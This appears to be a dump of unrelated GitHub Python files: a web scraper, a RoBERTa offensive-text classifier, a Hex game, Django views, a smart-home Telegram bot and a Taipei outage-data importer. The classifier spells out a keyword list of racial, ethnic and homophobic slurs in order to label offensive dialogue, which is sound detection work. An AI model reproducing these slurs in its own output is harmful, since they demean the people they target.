:\n break\n\n lastCount = lenOfPage\n time.sleep(3)\n lenOfPage = driver.execute_script(\n \"window.scrollTo(0, document.body.scrollHeight);var lenOfPage=document.body.scrollHeight;return lenOfPage;\"\n )\n if lastCount == lenOfPage:\n match = True\n counter += 1\n\n\ndef gather_links():\n global temp_df\n # EXTRACT PAGE SOURCE AFTER SCROLLING\n page_source = driver.page_source\n soup = BeautifulSoup(page_source, 'lxml')\n\n # BS4 to parse links so far\n # refresh the 'class_' component below\n divsoup = soup.find_all('div', class_ =\"fk el fl fm\")\n print(f'>> Count of items prior parsing {len(divsoup)}')\n\n titles, links = [], []\n for ds in divsoup:\n\n # scrape links\n link = (ds.find('a', href=True)['href'])\n link = link.replace('source=bookmarks', 'rr')\n if not link.startswith('https'):\n link = 'https://medium.com' + link\n links.append(link)\n\n # scrape title articles\n # refresh the 'class_' component below\n title = ds.find('h2', class_='ax gd cg az ge cj').text\n titles.append(title)\n\n print(f'>> Running Count of {len(titles)} titles with {len(links)} links')\n assert len(titles) == len(links)\n temp_df = pd.DataFrame({'title' : titles, 'link' : links})\n\n\ndef diff_checker(saved_links_df,temp_df):\n global intersection\n global updated_title_link_df\n intersection = list(set(temp_df.title.tolist()).intersection(set(saved_links_df.title.tolist())))\n new_titles = list(set(temp_df.title.tolist()).difference(set(saved_links_df.title.tolist())))\n new_titles_df = temp_df.query(\" title in @new_titles \")\n updated_title_link_df = pd.concat([new_titles_df, saved_links_df])\n\n\nif __name__ == \"__main__\":\n\n start = time.time()\n browse_medium_bookmarks()\n scroll_down_to_existing()\n driver.close()\n print(f'Saving new file with {updated_title_link_df.shape[0]} rows')\n updated_title_link_df.to_pickle('data/title_link.pkl')\n end = time.time()\n print(f'Process took {end-start}')\n","repo_name":"Takfes/python-nlp-medium","sub_path":"code/scrape_medium_v1.py","file_name":"scrape_medium_v1.py","file_ext":"py","file_size_in_byte":5279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"39834199303","text":"from transformers import RobertaForSequenceClassification\nfrom transformers import RobertaTokenizer\nfrom torch.utils.data import DataLoader, TensorDataset\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch import tensor\nimport json\nimport numpy as np\n\n# EPOCH = 10\n# train_path = 'train.json'\n# test_path = 'test.json'\n# valid_path = \"valid.json\"\n# LR = 0.001\n# use_focal_loss=1\n# DEVICE = torch.device(\"cuda:4\")\n# BATCH_SIZE = 32\n\n# model = RobertaForSequenceClassification.from_pretrained('roberta-base')\n# tokenizer = RobertaTokenizer.from_pretrained('roberta-base')\n# optimizer = torch.optim.AdamW(model.parameters(), lr=LR)\n# model = model.to(DEVICE)\n\ndef sigmoid_focal_loss(\n inputs: torch.Tensor,\n targets: torch.Tensor,\n alpha: float = 0.25,\n gamma: float = 2,\n reduction: str = \"none\",\n):\n \"\"\"\n Original implementation from https://github.com/facebookresearch/fvcore/blob/master/fvcore/nn/focal_loss.py .\n Loss used in RetinaNet for dense detection: https://arxiv.org/abs/1708.02002.\n\n Args:\n inputs: A float tensor of arbitrary shape.\n The predictions for each example.\n targets: A float tensor with the same shape as inputs. 
Stores the binary\n classification label for each element in inputs\n (0 for the negative class and 1 for the positive class).\n alpha: (optional) Weighting factor in range (0,1) to balance\n positive vs negative examples or -1 for ignore. Default = 0.25\n gamma: Exponent of the modulating factor (1 - p_t) to\n balance easy vs hard examples.\n reduction: 'none' | 'mean' | 'sum'\n 'none': No reduction will be applied to the output.\n 'mean': The output will be averaged.\n 'sum': The output will be summed.\n Returns:\n Loss tensor with the reduction option applied.\n \"\"\"\n p = torch.sigmoid(inputs)\n ce_loss = F.binary_cross_entropy_with_logits(\n inputs, targets, reduction=\"none\"\n )\n p_t = p * targets + (1 - p) * (1 - targets)\n loss = ce_loss * ((1 - p_t) ** gamma)\n\n if alpha >= 0:\n alpha_t = alpha * targets + (1 - alpha) * (1 - targets)\n loss = alpha_t * loss\n\n if reduction == \"mean\":\n loss = loss.mean()\n elif reduction == \"sum\":\n loss = loss.sum()\n\n return loss\n\n# class FocalLoss(nn.Module):\n# def __init__(self, alpha=0.999, gamma=2):\n# super(FocalLoss, self).__init__()\n# self.alpha = alpha\n# self.gamma = gamma\n\n# def forward(self, inputs, targets):\n# bce_loss = F.binary_cross_entropy(inputs.squeeze(), targets)\n# loss = self.alpha * (1 - torch.exp(-bce_loss)) ** self.gamma * bce_loss\n# return loss\n\n\ndef isPolluted(sentence):\n is_fuck=0\n if \"fuck\" in sentence or \"Fuck\" in sentence or \"fucking\" in sentence:\n is_fuck=1\n return 1\n\n is_offensive_prefix=0\n offensive_list=[\" BS\",\" crap\",\"that mouth\",\"dare\",\"hell\",\"devil\",\"bitch\",\n \"son of\",\"Son of\",\"Damn\",\"big mouth\",\" beast\",\" sick\",\"hate\",\n \"bother\"]\n for word in offensive_list:\n if word in sentence:\n is_offensive_prefix=1\n return 1\n\n is_offensive_role=0\n dirty_role_ls=[\"nigger\",\"negro\",\"chink\",\" spic\",\" honky\",\" kraut\",\" kike\",\n \"bitch\",\" cunt\",\"faggot\",\"dyke\"]\n for dr in dirty_role_ls:\n if dr in sentence:\n is_offensive_role=1\n return 1\n\n return 0.0\n\n\n\ndef preprocess(tokenizer,device,batch_size=32):\n root_dir=\"/home/liangzi/datasets/soloist/pollution0.1-multiwoz-2.1/\"\n train_dataset = make_dataset(mode=\"train\",\n tokenizer=tokenizer,\n device=device,\n root_dir=root_dir)\n test_dataset = make_dataset(mode=\"test\",\n tokenizer=tokenizer,\n device=device,\n root_dir=root_dir)\n val_dataset = make_dataset(mode=\"val\",\n tokenizer=tokenizer,\n device=device,\n root_dir=root_dir) \n\n\n train_loader = DataLoader(train_dataset,\n batch_size=batch_size,\n shuffle=True,\n drop_last=True)\n val_loader = DataLoader(val_dataset,\n batch_size=batch_size,\n shuffle=True,\n drop_last=True)\n test_loader = DataLoader(test_dataset,\n batch_size=batch_size,\n shuffle=True,\n drop_last=True)\n\n # test_loader = DataLoader(test_dataset,\n # batch_size=batch_size,\n # drop_last=True)\n \n # valid_loader = DataLoader(valid_dataset,\n # batch_size=batch_size,\n # drop_last=True)\n\n return train_loader,test_loader,val_loader\n\ndef make_dataset(mode, tokenizer, device,root_dir=\"/home/liangzi/datasets/soloist/Hpollution0.1-multiwoz-2.1/\"):\n path_name = \"train\" + '.json'\n path_name=root_dir+path_name\n with open(path_name, 'r') as f:\n text = json.load(f)\n features = []\n labels = []\n text = text['dialogues']\n\n num_samples=len(text)\n train_num=int(0.7*num_samples)\n val_num=int(0.1*num_samples)\n test_num=num_samples-train_num-val_num\n if mode==\"train\":\n text=text[:train_num]\n elif mode ==\"test\":\n 
text=text[train_num:(train_num+test_num)]\n else:\n text=text[(train_num+test_num):]\n \n \n for i,dialogues in enumerate(text):\n items = dialogues['items']\n for ii in range(len(items)):\n if ii % 2 == 0:\n continue\n new_text = items[ii]['delexicalised_text']\n\n if isPolluted(new_text):\n labels.append([1])\n else:\n labels.append([0])\n\n index_tokens, segment_id, input_mask = convert_text_to_ids_segment(new_text,max_sentence_length=15, tokenizer=tokenizer)\n\n features.append(index_tokens)\n\n \n feature = tensor(features, dtype=torch.long).to(device, dtype=torch.long)\n label = tensor(labels, dtype=torch.long).to(device, dtype=torch.long)\n # print(all_feature.shape, all_label.shape)\n \n dataset = TensorDataset(feature, label)\n\n return dataset\n\n\ndef convert_text_to_ids_segment(text, max_sentence_length,tokenizer):\n tokenize_text = tokenizer.tokenize(text)\n index_tokens = tokenizer.convert_tokens_to_ids(tokenize_text)\n input_mask = [1] * len(index_tokens)\n if max_sentence_length < len(index_tokens):\n index_tokens = index_tokens[:max_sentence_length]\n segment_id = [0] * max_sentence_length\n input_mask = input_mask[:max_sentence_length]\n else:\n pad_index_tokens = [0] * (max_sentence_length - len(index_tokens))\n index_tokens.extend(pad_index_tokens)\n input_mask_pad = [0] * (max_sentence_length - len(input_mask))\n input_mask.extend(input_mask_pad)\n segment_id = [] * max_sentence_length\n\n # index_tokens = torch.tensor(index_tokens, dtype=torch.long)\n # segment_id = torch.tensor(segment_id, dtype=torch.long)\n # input_mask = torch.tensor(input_mask, dtype=torch.long)\n return index_tokens, segment_id, input_mask\n\n\ndef train(model, optimizer, train_loader,EPOCH,LR,DEVICE, batch_size=32, use_focal_loss=1):\n for epoch in range(EPOCH):\n correct = 0\n undetected = 0\n detected = 0\n # nums=len(train_loader)\n print(f\"-------EPOCH {epoch}-------------\")\n for i,(inputs, labels) in enumerate(train_loader):\n # print(inputs.shape)\n outputs = model(inputs,labels=labels)\n prediction = torch.nn.functional.softmax(outputs.logits,dim=1)\n if use_focal_loss==0:\n loss = outputs.loss\n else:\n # print(\"=============\")\n # print(labels.shape)\n # print(labels)\n new_labels=F.one_hot(labels.squeeze(1),num_classes=2)\n # print(f\"prediciton: {prediction.shape}\")\n # print(f\"new_labels: {new_labels.shape}\")\n loss=sigmoid_focal_loss(prediction,new_labels.float(),\n alpha=0.99,gamma=1,reduction=\"mean\")\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n predict_result = torch.nn.functional.softmax(outputs.logits, dim=1)\n predict_result = torch.argmax(predict_result, dim=1).cpu().numpy()\n\n # print(labels.shape,labels,predict_result.shape,predict_result)\n for ii in range(batch_size):\n if labels[ii][0] == predict_result[ii]:\n correct += 1\n \n if labels[ii][0] == 1 and predict_result[ii]==0:\n undetected += 1\n\n if labels[ii][0] == 1 and predict_result[ii]==1:\n detected += 1\n if i%100==0:\n print(f\"loss:{loss.item()}\")\n \n print(f\"Accuracy:{correct/((i+1)*batch_size)}\")\n print(f\"Recall:{detected/(detected+undetected)}\")\n\ndef test(test_loader,model,batch_size=32):\n correct = 0\n print(\"--------TEST---------\")\n for i,(inputs, labels) in enumerate(test_loader):\n outputs = model(inputs,labels=labels)\n loss = outputs.loss\n\n predict_result = torch.nn.functional.softmax(outputs.logits, dim=1)\n predict_result = torch.argmax(predict_result, dim=1).cpu().numpy()\n\n\n # print(labels.shape,labels,predict_result.shape,predict_result)\n for ii in 
range(batch_size):\n            if labels[ii][0] == predict_result[ii]:\n                correct += 1\n\n    print(f\"TEST Accuracy:{correct/((i+1)*batch_size)}\")\n\ndef save_model(model):\n    PATH = 'roberta_model.pkl'\n    torch.save(model, PATH) \n\ndef main():\n    # text = \"damn you, i've buy it\" # little test\n    # inputs = tokenizer(text, return_tensors=\"pt\")\n\n    # outputs = model(**inputs)\n    # predicted = torch.nn.functional.softmax(outputs.logits, dim=1)\n    # predicted = torch.argmax(predicted, dim=1).numpy()\n    # print(predicted)\n    EPOCH = 1\n    LR = 3e-6 \n    use_focal_loss=1\n    DEVICE = torch.device(\"cuda:4\")\n    BATCH_SIZE =32\n    # BATCH_SIZE =4\n\n    model = RobertaForSequenceClassification.from_pretrained('roberta-base')\n    tokenizer = RobertaTokenizer.from_pretrained('roberta-base')\n    optimizer = torch.optim.AdamW(model.parameters(), lr=LR)\n    model = model.to(DEVICE)\n\n    train_loader,test_loader,valid_loader = preprocess(tokenizer=tokenizer,device=DEVICE,batch_size=BATCH_SIZE)\n\n    train(model=model, optimizer=optimizer, train_loader=train_loader, batch_size=BATCH_SIZE,EPOCH=EPOCH,LR=LR,use_focal_loss=use_focal_loss,DEVICE=DEVICE,)\n    save_model(model=model)\n\n    \n    PATH = 'roberta_model.pkl'\n    model=torch.load(PATH)\n    model.to(DEVICE)\n    test(test_loader=test_loader,model=model,batch_size=BATCH_SIZE)\n\n    \nif __name__ == '__main__':\n    main()\n\n","repo_name":"liangzid/TEMP","sub_path":"tod/soloist/robertaCLS/roberta_classifier.py","file_name":"roberta_classifier.py","file_ext":"py","file_size_in_byte":11315,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"57"} +{"seq_id":"3715789817","text":"import unittest\nfrom unittest import mock\nfrom jirabuddy import JiraBuddy\n\n\nclass JiraBuddyTestCase(unittest.TestCase):\n    @mock.patch(\"jirabuddy.JIRA\")\n    def testConnectToJira(self, mock_jira):\n        mock_jira.return_value = \"blubb\"\n        \n        j = JiraBuddy()\n        ret = j.connectToJira(\"http://127.0.0.1\")\n        assert ret == \"blubb\"\n\n","repo_name":"haloz/learnpy","sub_path":"mock2/jirabuddy_test.py","file_name":"jirabuddy_test.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"7994641143","text":"# 서로 같은 반이였던 사람이 많은 학생을 임시반장으로 선출하려고 함\r\n# 임시 반장으로 정해진 학생의 번호를 출력하는데 여러 명인 경우에 가장 작은 번호만 출력\r\n\r\nN = int(input())\r\nstudents = []\r\nfor i in range(N):\r\n    students.append([int(j) for j in input().split()])\r\n\r\nmax_friend = -1\r\nbanjang = -1\r\nfor student_no in range(N):\r\n    result = set()\r\n    for grade in range(5):\r\n        for friend in range(N):\r\n            if students[student_no][grade] == students[friend][grade]:\r\n                result.add(friend)\r\n\r\n    if len(result) > max_friend:\r\n        banjang = student_no + 1\r\n        max_friend = len(result)\r\nprint(banjang)","repo_name":"tjrmswo/Algorithm","sub_path":"bronzeⅠ/1268.py","file_name":"1268.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"32693613136","text":"import copy\nfrom typing import List, Tuple\nfrom .state import State\nfrom .sim_world import SimWorld\nimport numpy as np\nimport random\n\n\nclass HexGame(SimWorld):\n    def __init__(self, K: int):\n        self.set_board_size(K)\n        return\n\n    def get_initial_state(self) -> State:\n        return State(np.zeros((self.board_size**2)), 1 if random.random() > 0.5 else 2)\n\n    def get_legal_actions(self, state: State) -> List[int]:\n        return list(np.where(state.state == 0)[0])\n\n    def get_total_amount_of_actions(self) -> int:\n        return 
self.board_size**2\n\n def set_board_size(self, K):\n \"\"\"\n set the board size of the hex game\n \"\"\"\n self.board_size = K\n self.action_index_to_neighbors: List[List[int]] = []\n for action in range(K**2):\n self.action_index_to_neighbors.append(self.get_neighbors(action))\n\n return\n\n def get_new_state(\n self, SAP: Tuple[State, int], verbose=False\n ) -> Tuple[State, bool, int]:\n player = SAP[0].player\n state = copy.deepcopy(SAP[0])\n action = SAP[1]\n\n if state.state[action] != 0:\n raise Exception(\n \"Cannot put piece where there is already one placed!\")\n\n is_winning_move = self.is_winning_move(SAP)\n reward = 0\n\n if is_winning_move:\n reward = 1 if player == 1 else -1\n\n state.state[action] = state.player\n state.player = ((state.player) % 2) + 1\n\n return (state, is_winning_move, reward)\n\n def is_winning_move(self, SAP: Tuple[State, int]) -> bool:\n \"\"\"\n checks if the current move results in a win for the given player\n \"\"\"\n # find walls hit connecting from placed piece\n walls = self.search(SAP[0], SAP[1])\n\n # if both walls are reached from the placed piece (0 and 1), the move is a winning move\n if 0 in walls and 1 in walls:\n return True\n\n # otherwise, not a winning move\n return False\n\n def visualize_state(self, state: State):\n \"\"\"\n visualize the board in a diamond shape\n \"\"\"\n string_builder = \"\"\n\n counter = 0\n\n while counter < 2 * self.board_size - 1:\n for _ in range(abs(self.board_size - counter - 1)):\n string_builder += \" \"\n\n lst = []\n\n for i in range(self.board_size):\n for j in range(self.board_size):\n if i + j == counter:\n lst.append(\n int(state.state[self.from_row_col_to_action(\n (j, i))])\n )\n\n for i in lst:\n string_builder += str(i) + \" \"\n\n string_builder += \"\\n\"\n counter += 1\n\n print(string_builder)\n\n return\n\n def search(self, state: State, node: int):\n # check if spot is the players wall\n queue = [node]\n visited = set(())\n walls = set(())\n\n while len(queue) > 0:\n node = queue.pop()\n visited.add(node)\n walls.add(self.is_action_wall(node, state.player))\n for neighbour in self.action_index_to_neighbors[node]:\n if (\n int(state.state[neighbour]) == state.player\n and neighbour not in visited\n ):\n queue.append(neighbour)\n\n return walls\n\n def is_action_wall(self, action: int, player: int) -> int:\n \"\"\"\n returns 0 and 1 if given spot for player is a wall, depending on the wall.\n returns -1 if not a wall.\n \"\"\"\n (row, col) = self.from_action_to_row_col(action)\n\n if player == 1:\n if row == 0:\n return 0\n elif row == self.board_size - 1:\n return 1\n\n elif player == 2:\n if col == 0:\n return 0\n if col == self.board_size - 1:\n return 1\n\n return -1\n\n def get_neighbors(self, action: int) -> List[int]:\n \"\"\"\n find neighbors for position of given action\n \"\"\"\n (row, col) = self.from_action_to_row_col(action)\n neighbors: List[int] = []\n\n if row + 1 < self.board_size:\n neighbors.append(self.from_row_col_to_action((row + 1, col)))\n if col - 1 >= 0:\n neighbors.append(\n self.from_row_col_to_action((row + 1, col - 1)))\n if col + 1 < self.board_size:\n neighbors.append(self.from_row_col_to_action((row, col + 1)))\n\n if row - 1 >= 0:\n neighbors.append(self.from_row_col_to_action((row - 1, col)))\n if col + 1 < self.board_size:\n neighbors.append(\n self.from_row_col_to_action((row - 1, col + 1)))\n if col - 1 >= 0:\n neighbors.append(self.from_row_col_to_action((row, col - 1)))\n\n return neighbors\n\n def from_row_col_to_action(self, row_col: Tuple[int, 
int]) -> int:\n (row, col) = (row_col[0], row_col[1])\n return row * self.board_size + col\n\n def from_action_to_row_col(self, action: int) -> Tuple[int, int]:\n \"\"\"\n translates action integer to row/column in hex board\n \"\"\"\n return (action // self.board_size, action % self.board_size)\n\n def get_n_observations(self) -> int:\n return self.board_size**2\n\n def is_end_state(self) -> bool:\n return True\n","repo_name":"Haavasma/IT3105_Project_2","sub_path":"SimWorlds/HexGame.py","file_name":"HexGame.py","file_ext":"py","file_size_in_byte":5475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"44017404787","text":"import logging\nimport random\nimport enum\n\nimport shc\nfrom shc.interfaces.telegram import SimpleTelegramAuth, TelegramBot\nfrom shc.web.widgets import *\n\n\n# An enum of special values\nclass Fruits(enum.Enum):\n APPLES = 0\n LEMONS = 1\n BANANAS = 2\n\n\n# Some State variables to interact with\nfoo = shc.Variable(bool, 'foo', initial_value=False)\nbar = shc.Variable(bool, 'bar', initial_value=False)\nfoobar = shc.Variable(bool, 'foobar', initial_value=False)\nnumber_of_yaks = shc.Variable(int, 'number_of_yaks', initial_value=0)\nyak_name = shc.Variable(str, 'yak_name')\n\n\n# A web server\nweb_server = shc.web.WebServer('localhost', 8080, index_name='index')\n\nindex_page = web_server.page('index', 'Home', menu_entry=True, menu_icon='home')\n\nindex_page.add_item(ButtonGroup(\"State of the foobar\", [\n ToggleButton(\"Foo\").connect(foo),\n ToggleButton(\"Bar\", color='red').connect(bar),\n ToggleButton(\"Foobar\", color='black').connect(foobar),\n]))\nindex_page.add_item(TextInput(int, \"Number of yaks\", min=0, max=100, step=1, input_suffix=\"pc.\")\n .connect(number_of_yaks))\nindex_page.add_item(TextInput(str, \"Yak's name\")\n .connect(yak_name))\n\n# The Telegram bot\ntelegram_auth = SimpleTelegramAuth({'michael': 123})\ntelegram_bot = TelegramBot(\"123456789:exampleTokenXXX\", telegram_auth)\n\ntelegram_bot.on_off_connector(\"Foo\", {'michael'}).connect(foo)\ntelegram_bot.on_off_connector(\"Bar\", {'michael'}).connect(bar)\ntelegram_bot.on_off_connector(\"Foobar\", {'michael'}).connect(foobar)\ntelegram_bot.str_connector(\"Yak Name\", {'michael'}).connect(yak_name)\ntelegram_bot.generic_connector(int, \"Yak Number\", lambda x: str(x), lambda x: int(x), {'michael'})\\\n .connect(number_of_yaks)\n\n# For Python 3.7 compatibility, we store the trigger in a variable first, before applying it as a decorator to the logic\n# handler function. 
From Python 3.8 on, you can simply write the full expression as a decorator.\nrandom_yaks_trigger = telegram_bot.trigger_connector(\"Random Yaks\", {'michael'}).trigger\n\n\n@random_yaks_trigger\n@shc.handler()\nasync def random_yaks(_v, _o):\n await number_of_yaks.write(random.randint(0, 255))\n\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.DEBUG)\n shc.main()\n","repo_name":"mhthies/smarthomeconnect","sub_path":"example/telegram.py","file_name":"telegram.py","file_ext":"py","file_size_in_byte":2243,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"57"} +{"seq_id":"32613612530","text":"from django.shortcuts import render\nfrom django.http import JsonResponse\nfrom rest_framework import status\n\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom .serializers import *\n\nfrom .models import channel\n\n@api_view(['GET'])\ndef apiOverview(request):\n api_urls = {\n 'List_stories_channels':'/channels-list/',\n 'stories_channels_Detailview':'channels-view/',\n 'Create_stories_channels':'/create-channel/',\n 'Update-stories_channels': '/channel-update//',\n 'Delete_stories_channels': '/channels-delete//',\n }\n\n return Response(api_urls)\n\n@api_view(['GET'])\ndef stories_channels_List(request):\n _channels = story_channels.objects.all()\n serializer = story_channelsSerializer(_channels , many=True)\n return Response(serializer.data)\n\n\n@api_view(['GET'])\ndef stories_channels_detail(request , pk):\n _channel = story_channels.objects.get(pk=pk)\n serializer = story_channelsSerializer(_channel , many=False)\n\n return Response(serializer.data)\n\n\n@api_view(['POST'])\ndef create_stories_channels(request):\n serializer = story_channelsSerializer(data=request.data)\n\n if serializer.is_valid():\n serializer.save()\n\n return Response(serializer.data)\n\n\n@api_view(['POST'])\ndef update_stories_channels(request , pk):\n _channel = story_channels.objects.get(pk=pk)\n serializer = story_channelsSerializer( instance=_channel, data=request.data)\n\n if serializer.is_valid():\n serializer.save()\n\n return Response(serializer.data)\n\n@api_view(['DELETE'])\ndef Delete_stories_channels(request, pk):\n _channel = story_channels.objects.get(pk=pk)\n _channel.delete()\n\n return Response(status=status.HTTP_204_NO_CONTENT)\n","repo_name":"GHASSAN007/Podcast","sub_path":"Podcast_Mini_Backend/Channels/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"15214055001","text":"import numpy as np\nimport scipy as sc\n\ndef compute_DCT(f):\n \"\"\"Compute the 1D discrete cosine transform \n\n Parameter:\n f (numpy array): function\n Return:\n k (numpy array): modes\n Fk (numpy array): cosine transform coefficients\n \"\"\"\n N = len(f)\n Fk = sc.fft.dct(f, 1)/N\n Fk[0] = Fk[0]/2\n Fk[-1] = Fk[-1]/2\n k = np.arange(0, N)\n return k, Fk\n","repo_name":"mulligatawny/me408-hw5","sub_path":"compute_DCT.py","file_name":"compute_DCT.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"10309773371","text":"# coding=utf-8\n\nfrom abc import ABCMeta, abstractmethod\nfrom collections import namedtuple\nfrom datetime import datetime, timezone, timedelta\nimport os\nimport shutil\nimport time\nimport urllib.parse\nimport uuid\nimport zipfile\nimport requests\n\nfrom . 
import map_converter\nfrom . import datetime_parser\nfrom . import location_parser\nfrom . import power_web_parser\nfrom .dbconnector import DBConnector\nfrom .dbschema import Event, Coordinate, EventType\n\nLDB_URL = os.environ['LDB_URL']\nTZ = timezone(timedelta(hours=8))\n\nclass DataImporter(object):\n __metaclass__ = ABCMeta\n\n def __init__(self):\n self.connect = DBConnector(LDB_URL)\n self.session = self.connect.get_session()\n\n @abstractmethod\n def get_event_type(self):\n pass\n\n @abstractmethod\n def get_raw_data(self):\n pass\n\n @abstractmethod\n def generate_events(self, source):\n pass\n\n def import_data(self):\n source = self.get_raw_data()\n if not source:\n return\n\n self._set_events_inactive()\n\n for e in self.generate_events(source):\n e.is_active = True\n if e.is_valid():\n self._insert_entry(e)\n\n self.session.commit()\n self.session.close()\n\n def _set_events_inactive(self):\n for e in self.session.query(Event)\\\n .filter(Event.type == self.get_event_type())\\\n .filter(Event.is_active == True):\n e.is_active = False\n\n def _insert_entry(self, e):\n with self.session.no_autoflush:\n existed = self.session.query(Event)\\\n .filter(Event.gov_sn == e.gov_sn)\\\n .filter(Event.type == e.type)\\\n .filter(Event.city == e.city)\\\n .filter(Event.district == e.district)\\\n .filter(Event.detail_addr == e.detail_addr)\\\n .filter(Event.start_date == e.start_date)\\\n .filter(Event.end_date == e.end_date)\\\n .filter(Event.start_time == e.start_time)\\\n .filter(Event.end_time == e.end_time)\\\n .filter(Event.description == e.description)\\\n .first()\n if existed:\n existed.update_time = datetime.now(TZ)\n existed.is_active = True\n else:\n e.update_time = e.create_time = datetime.now(TZ)\n self.session.add(e)\n\n\nclass WaterImporter(DataImporter):\n\n _WATER_SOURCE = 'http://data.taipei/opendata/datalist/apiAccess?scope=resourceAquire&rid=a242ee9b-b954-4ae9-9827-2344c5dfeaea'\n\n def __init__(self):\n super().__init__()\n\n def get_event_type(self):\n return EventType.water\n\n def get_raw_data(self):\n response = requests.get(self._WATER_SOURCE)\n if response.status_code == 200:\n print('Web (WATER OUTAGE) request is ok.')\n return response.json()\n else:\n print('Web (WATER OUTAGE) request is NOT ok. 
Response status code = %s.'\n % response.status_code)\n return None\n\n def generate_events(self, source):\n for event_water in source['result']['results']:\n timeinfo = datetime_parser.parse_water_road_time(event_water['Description'])\n coordinates = event_water['StopWaterSection_wgs84']['coordinates'][0]\n\n # Convert coordinate to address\n latitude = coordinates[0][1]\n longitude = coordinates[0][0]\n address = map_converter.convert_coordinate_to_address(latitude, longitude)\n\n location_info = location_parser.parse_water_address(address)\n \n description_info = location_parser.parse_water_description(event_water['Description'])\n\n event_model = Event(\n id=get_uuid(),\n type=self.get_event_type(),\n gov_sn=event_water['SW_No'],\n city=location_info[0],\n district=location_info[1],\n detail_addr=location_info[2],\n start_date=datetime_parser.roc_to_common_date(event_water['FS_Date']),\n end_date=datetime_parser.roc_to_common_date(event_water['FC_Date']),\n start_time=timeinfo[0],\n end_time=timeinfo[1],\n description=description_info,\n )\n for coor in coordinates:\n event_model.coordinates.append(Coordinate(id=get_uuid(),\n wgs84_latitude=coor[1],\n wgs84_longitude=coor[0]))\n yield event_model\n\n\nclass RoadImporter(DataImporter):\n\n _ROAD_SOURCE = 'http://data.taipei/opendata/datalist/apiAccess?scope=resourceAquire&rid=201d8ae8-dffc-4d17-ae1f-e58d8a95b162'\n\n def __init__(self):\n super().__init__()\n\n def get_event_type(self):\n return EventType.road\n\n def get_raw_data(self):\n response = requests.get(self._ROAD_SOURCE)\n if response.status_code == 200:\n print('Web (ROAD CONSTRUCTION) request is ok.')\n return response.json()\n else:\n print('Web (ROAD CONSTRUCTION) request is NOT ok. Response status code = %s.'\n % response.status_code)\n return None\n\n def generate_events(self, source):\n for event in source['result']['results']:\n timeinfo = datetime_parser.parse_water_road_time(event['CO_TI'])\n\n # Convert TWD97 to WGS84\n latitude, longitude = map_converter.twd97_to_wgs84(float(event['X']), float(event['Y']))\n\n # Convert coordinate to address\n address = map_converter.convert_coordinate_to_address(latitude, longitude)\n\n location_info = location_parser.parse_road_address(address)\n\n event_model = Event(\n id=get_uuid(),\n type=self.get_event_type(),\n gov_sn='#'.join((event['AC_NO'], event['SNO'])),\n city=location_info[0],\n district=location_info[1],\n detail_addr=location_info[2],\n start_date=datetime_parser.roc_to_common_date(event['CB_DA']),\n end_date=datetime_parser.roc_to_common_date(event['CE_DA']),\n start_time=timeinfo[0],\n end_time=timeinfo[1],\n description=event['NPURP'],\n )\n event_model.coordinates.append(Coordinate(id=get_uuid(),\n wgs84_latitude=latitude,\n wgs84_longitude=longitude))\n yield event_model\n\n\nclass PowerImporter(DataImporter):\n\n _POWER_SOURCE = 'http://branch.taipower.com.tw/Content/NoticeBlackout/bulletin.aspx?SiteID=564732646551216421&MmmID=616371300113254267'\n\n def __init__(self):\n super().__init__()\n\n def get_event_type(self):\n return EventType.power\n\n def get_raw_data(self):\n response = requests.get(self._POWER_SOURCE)\n if response.status_code == 200:\n print('Web (POWER OUTAGE) request is ok.')\n \n info = power_web_parser.get_html_info(response)\n return info\n else:\n print('Web (POWER OUTAGE) request is NOT ok. Response status code = %s.' 
% response.status_code)\n            return None\n\n    def generate_events(self, source):\n        # arrange data and insert to table\n        for event in source:\n            \n            (date_info, start_time_info, end_time_info, sn_info, description_info, location_info, latitude, longitude) = event\n            \n            event_model = Event(\n                id=get_uuid(),\n                type=self.get_event_type(),\n                gov_sn=sn_info,\n                city=location_info[0],\n                district=location_info[1],\n                detail_addr=location_info[2],\n                start_date=date_info,\n                end_date=date_info,\n                start_time=start_time_info,\n                end_time=end_time_info,\n                description=description_info,\n            )\n            event_model.coordinates.append(Coordinate(id=get_uuid(),\n                                                      wgs84_latitude=latitude,\n                                                      wgs84_longitude=longitude))\n            yield event_model\n\n\n### Import all types of livelihood data ###\ndef import_all():\n    WaterImporter().import_data()\n    RoadImporter().import_data()\n    PowerImporter().import_data()\n\n\n### Create livelihood database ###\ndef create_tables():\n    connect = DBConnector(LDB_URL)\n    connect.create_tables()\n\n\ndef get_uuid():\n    return str(uuid.uuid4())\n\n\n","repo_name":"StudyNightClub/livelihood-database","sub_path":"livelihood_database/livelihood.py","file_name":"livelihood.py","file_ext":"py","file_size_in_byte":8559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"}
